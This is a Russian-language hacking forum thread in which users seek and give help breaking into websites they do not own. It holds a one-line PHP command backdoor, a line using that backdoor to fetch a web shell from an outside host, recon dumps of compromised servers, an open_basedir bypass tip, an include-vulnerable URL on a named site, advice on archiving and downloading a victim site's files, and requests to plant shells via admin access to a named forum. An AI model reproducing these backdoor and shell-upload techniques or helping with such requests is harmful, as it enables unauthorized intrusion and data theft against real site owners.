Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Konqi
    абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь))
    ладно попробую.только узнаю как это делается для начала
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ну вот самый примитивный пример frame.

    _ttp://www.prodisney.ru/index.php?page=http://rambler.ru

    Это ну никак нельзя перепутать с RFI
     
    _________________________
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Как обойти open_basedir? сколько не пробывал не получается)
    Code:
    [B]Server software:[/B] Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
    [B]Loaded Apache modules:[/B] core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr
    [B]Disabled PHP Functions:[/B] none
    [B]Open base dir:[/B] /home/lc/data:.
    [B]cURL support:[/B] enabled
    [B]Supported databases:[/B] MySql (5.0.67), MSSQL, PostgreSQL
    
    [B]Readable /etc/passwd:[/B] no
    [B]Readable /etc/shadow:[/B] no
    
    [B]Userful:[/B] gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl
    [B]Danger:[/B] ipfw
    [B]Downloaders:[/B] wget, fetch, lynx, curl, lwp-mirror
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Попробуй тут посмотреть

    "Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."
     
    _________________________
  5. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Да сработало, создал файл с <?php system($_GET["cmd"]); ?>
    -------
    P.S> OxoTnik спасибо, но уже сделал по другому))
     
    #21185 kacergei, 15 Oct 2012
    Last edited: 15 Oct 2012
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    скрипт_где_бекдор.php?cmd=phpinfo(); тут посмотри пути до скрипта


    скрипт_где_бекдор.php?cmd=copy("http://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");
     
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    [​IMG]
     
    _________________________
    1 person likes this.
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    [offtop]
    последние 3 поста оставлю на память потомкам
    Прошу остальных модераторов не удалять сие посты =)
    [/offtop]
     
    _________________________
  9. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    )) *Улыбнуло*

    Возник еще вопрос, пытаюсь заархивировать получаю:
    $ tar cjf /tmp/site.tar.bz2 /usr/local/psa/home/vhosts/site.ru/ 2>&1
    /libexec/ld-elf.so.1: /usr/local/lib/liblzma.so.5: version XZ_5.0 required by /usr/lib/libarchive.so.5 not defined
    Code:
    Server software: Apache/2.0.63 (Unix) PHP/5.2.8
    Loaded Apache modules: core, prefork, http_core, mod_so, mod_access, mod_auth, mod_auth_anon, mod_auth_dbm, mod_charset_lite, mod_include, mod_deflate, mod_log_config, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_unique_id, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_asis, mod_info, mod_cgi, mod_vhost_alias, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_suexec, mod_php5, mod_rpaf-2
    Disabled PHP Functions: none
    Safe mode exec dir: /nonexec
    cURL support: enabled
    Supported databases: MySql (4.1.25)
    
    Readable /etc/passwd: yes [view]
    Readable /etc/shadow: no
    
    Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate
    Danger: clamd, ipfw, snort
    Downloaders: wget, fetch, lynx, links, curl, lwp-mirror
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Проблема в том, что функция архивирования не найдена (не установлена)

    Для решения проблемы тебе нужны права root для выполнения операций chroot и /etc/rc.d/ldconfig start

    З.Ы. Могу ошибаться
     
    _________________________
  11. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Какие есть еще варианты что бы заархивировать, а не качать по одному файлу?
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Web-Shell PAS архивирует данные на лету в zip-формат.

    Попробуй, вдруг поможет.
     
    _________________________
  13. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Пробывал, но есть одна проблема он иногда папку в которой 2 текстовых документа по несколько кб. он скачивает как 10-300 мб, и показывает битый архив
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Значит не так скачиваешь. Поднимайся на директорию выше. Указываешь галочкой папку, что собираешься скачать. Жмёшь Download. Попробуй.
     
    _________________________
  15. shumaher

    shumaher New Member

    Joined:
    16 Feb 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    там и сам инклюд не прячется, рядом:
    page=article_menu.php?menu_item=/blabla
     
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    как это дешифровать? --- дешифровал)
    ток что это значит хз)
     
    #21196 justonline, 16 Oct 2012
    Last edited: 16 Oct 2012
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    А в чём собственно вопрос ?
     
    _________________________
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    ну форуме в логах засветилась шифрованная шляпа...я запостил вопрос - как дешифровать, потом сам дешифровал)
     
  19. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Как залить шелл?
    Версия Xoops XOOPS 2.0.18.2
     
  20. eclipse92

    eclipse92 Banned

    Joined:
    17 Jan 2011
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -11
    Есть админка к форуму forum.simix.ru, как можно загнать шелл?
     
Thread Status:
Not open for further replies.